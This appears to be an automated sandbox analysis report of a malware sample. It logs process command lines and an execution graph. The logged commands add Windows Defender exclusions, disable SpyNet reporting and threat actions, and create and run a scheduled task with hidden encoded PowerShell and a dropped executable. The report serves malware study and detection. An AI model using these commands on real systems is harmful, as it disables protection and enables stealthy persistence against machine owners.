                                        Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                        Imagebase:0xb0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:8
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                        Imagebase:0xb0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:9
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:10
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:11
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:12
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:13
                                        Start time:19:15:13
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:14
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:15
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /run /I /tn "gbyyEslRl"
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:16
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:17
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                        Imagebase:0x7ff74b5f0000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:18
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:28
                                        Start time:19:15:30
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\gpupdate.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\gpupdate.exe" /force
                                        Imagebase:0x7ff6e5af0000
                                        File size:29184 bytes
                                        MD5 hash:47C68FE26B0188CDD80F744F7405FF26
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:29
                                        Start time:19:15:30
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:32
                                        Start time:19:15:31
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\gpscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:gpscript.exe /RefreshSystemParam
                                        Imagebase:0x7ff636b30000
                                        File size:44544 bytes
                                        MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:33
                                        Start time:19:15:31
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /DELETE /F /TN "gbyyEslRl"
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:34
                                        Start time:19:15:32
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:35
                                        Start time:19:15:33
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:36
                                        Start time:19:15:33
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:37
                                        Start time:19:15:36
                                        Start date:24/11/2022
                                        Path:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S
                                        Imagebase:0xa0000
                                        File size:7104512 bytes
                                        MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 51%, ReversingLabs

                                        General

                                        Target ID:38
                                        Start time:19:15:38
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                        Imagebase:0x1b0000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:39
                                        Start time:19:15:38
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:41
                                        Start time:19:16:24
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0xb0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:42
                                        Start time:19:16:24
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:43
                                        Start time:19:16:25
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:44
                                        Start time:19:16:26
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:45
                                        Start time:19:16:26
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:46
                                        Start time:19:16:26
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:47
                                        Start time:19:16:27
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:48
                                        Start time:19:16:27
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:51
                                        Start time:19:16:28
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:52
                                        Start time:19:16:28
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:53
                                        Start time:19:16:29
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:54
                                        Start time:19:16:29
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:208
                                        Start time:19:17:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:15%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:2.3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:44
                                          execution_graph 13088 411160 13091 413f9f 13088->13091 13092 411166 13091->13092 13093 413fcd 13091->13093 13094 414012 13093->13094 13095 413fd7 13093->13095 13097 41570a ctype 28 API calls 13094->13097 13107 414003 13094->13107 13108 41570a 13095->13108 13102 41401e ctype 13097->13102 13098 41406b RtlFreeHeap 13098->13092 13099 413fde ctype 13100 413ff8 13099->13100 13123 415ac8 13099->13123 13129 414009 13100->13129 13101 41404a 13136 414061 13101->13136 13102->13101 13132 41684f 13102->13132 13107->13092 13107->13098 13109 415760 EnterCriticalSection 13108->13109 13110 415722 13108->13110 13109->13099 13139 413e65 13110->13139 13113 415738 13115 41570a ctype 27 API calls 13113->13115 13116 415740 13115->13116 13117 415751 13116->13117 13118 415747 InitializeCriticalSection 13116->13118 13120 413f9f ctype 27 API calls 13117->13120 13119 415756 13118->13119 13148 41576b LeaveCriticalSection 13119->13148 13120->13119 13122 41575e 13122->13109 13124 415b06 13123->13124 13128 415dbc ctype 13123->13128 13125 415d02 VirtualFree 13124->13125 13124->13128 13126 415d66 13125->13126 13127 415d75 VirtualFree HeapFree 13126->13127 13126->13128 13127->13128 13128->13100 13232 41576b LeaveCriticalSection 13129->13232 13131 414010 13131->13107 13133 416892 13132->13133 13134 41687c 13132->13134 13133->13101 13134->13133 13233 416736 13134->13233 13242 41576b LeaveCriticalSection 13136->13242 13138 414068 13138->13107 13149 413e77 13139->13149 13142 414c0c 13143 414c15 13142->13143 13144 414c1a 13142->13144 13212 4177fd 13143->13212 13218 417836 13144->13218 13148->13122 13150 413e74 13149->13150 13152 413e7e ctype 13149->13152 13150->13113 13150->13142 13152->13150 13153 413ea3 13152->13153 13154 413ed0 13153->13154 13156 413f13 13153->13156 13155 41570a ctype 28 API calls 13154->13155 13161 413efe 13154->13161 13157 413ee6 13155->13157 13156->13161 13162 413f35 13156->13162 13171 415df1 13157->13171 13158 413f82 RtlAllocateHeap 13160 413f05 13158->13160 13160->13152 13161->13158 13161->13160 13164 41570a ctype 28 API calls 13162->13164 13166 413f3c 13164->13166 13180 416894 13166->13180 13168 413f4f 13187 413f69 13168->13187 13174 415e23 13171->13174 13172 415ec2 13176 413ef1 13172->13176 13197 4161ab 13172->13197 13174->13172 13174->13176 13190 4160fa 13174->13190 13177 413f0a 13176->13177 13201 41576b LeaveCriticalSection 13177->13201 13179 413f11 13179->13161 13181 4168a2 ctype 13180->13181 13182 416a63 13181->13182 13185 41698e VirtualAlloc 13181->13185 13186 41695f ctype 13181->13186 13202 41659c 13182->13202 13185->13186 13186->13168 13186->13186 13211 41576b LeaveCriticalSection 13187->13211 13189 413f5c 13189->13160 13189->13161 13191 41613d HeapAlloc 13190->13191 13192 41610d HeapReAlloc 13190->13192 13193 41618d 13191->13193 13195 416163 VirtualAlloc 13191->13195 13192->13193 13194 41612c 13192->13194 13193->13172 13194->13191 13195->13193 13196 41617d HeapFree 13195->13196 13196->13193 13198 4161bd VirtualAlloc 13197->13198 13200 416206 13198->13200 13200->13176 13201->13179 13203 4165b0 HeapAlloc 13202->13203 13204 4165a9 13202->13204 13205 4165cd VirtualAlloc 13203->13205 13206 416605 ctype 13203->13206 13204->13205 13207 4166c2 13205->13207 13208 4165ed VirtualAlloc 13205->13208 13206->13186 13207->13206 13209 4166ca HeapFree 13207->13209 13208->13206 13210 4166b4 VirtualFree 13208->13210 13209->13206 13210->13207 13211->13189 13214 417807 13212->13214 13213 417834 13213->13144 13214->13213 13215 417836 ctype 7 API calls 13214->13215 13216 41781e 13215->13216 13217 417836 ctype 7 API calls 13216->13217 13217->13213 13221 417849 13218->13221 13219 414c23 13219->13113 13220 417960 ctype 13223 417973 GetStdHandle WriteFile 13220->13223 13221->13219 13221->13220 13222 417889 13221->13222 13222->13219 13224 417895 GetModuleFileNameA 13222->13224 13223->13219 13225 4178ad ctype 13224->13225 13227 418320 13225->13227 13228 41832d LoadLibraryA 13227->13228 13231 41836f 13227->13231 13229 41833e GetProcAddress 13228->13229 13228->13231 13230 418355 GetProcAddress GetProcAddress 13229->13230 13229->13231 13230->13231 13231->13219 13232->13131 13236 416743 13233->13236 13234 4167f3 13234->13133 13235 416764 VirtualFree 13235->13236 13236->13234 13236->13235 13238 4166e0 VirtualFree 13236->13238 13239 4166fd 13238->13239 13240 41672d 13239->13240 13241 41670d HeapFree 13239->13241 13240->13236 13241->13236 13242->13138 13243 414b04 GetVersion 13274 4159f8 HeapCreate 13243->13274 13245 414b62 13246 414b67 13245->13246 13247 414b6f 13245->13247 13679 414c31 13246->13679 13286 4154bc 13247->13286 13251 414b74 13252 414b80 13251->13252 13253 414b78 13251->13253 13296 417641 13252->13296 13254 414c31 8 API calls 13253->13254 13256 414b7f 13254->13256 13256->13252 13257 414b8a GetCommandLineA 13310 41750f 13257->13310 13261 414ba4 13342 417209 13261->13342 13263 414ba9 13264 414bae GetStartupInfoA 13263->13264 13355 4171b1 13264->13355 13266 414bc0 GetModuleHandleA 13359 401014 13266->13359 13275 415a18 13274->13275 13276 415a4e 13274->13276 13693 4158b0 13275->13693 13276->13245 13279 415a34 13282 415a51 13279->13282 13284 41659c ctype 5 API calls 13279->13284 13280 415a27 13705 415a55 HeapAlloc 13280->13705 13282->13245 13283 415a31 13283->13282 13285 415a42 HeapDestroy 13283->13285 13284->13283 13285->13276 13806 4156e1 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 13286->13806 13288 4154c2 TlsAlloc 13289 4154d2 13288->13289 13290 41550c 13288->13290 13291 416efc 30 API calls 13289->13291 13290->13251 13292 4154db 13291->13292 13292->13290 13293 4154e3 TlsSetValue 13292->13293 13293->13290 13294 4154f4 13293->13294 13295 4154fa GetCurrentThreadId 13294->13295 13295->13251 13297 413e65 ctype 29 API calls 13296->13297 13298 417654 13297->13298 13299 417662 GetStartupInfoA 13298->13299 13300 414c0c ctype 7 API calls 13298->13300 13302 4176b0 13299->13302 13303 417781 13299->13303 13300->13299 13302->13303 13307 417727 13302->13307 13308 413e65 ctype 29 API calls 13302->13308 13304 4177ac GetStdHandle 13303->13304 13305 4177ec SetHandleCount 13303->13305 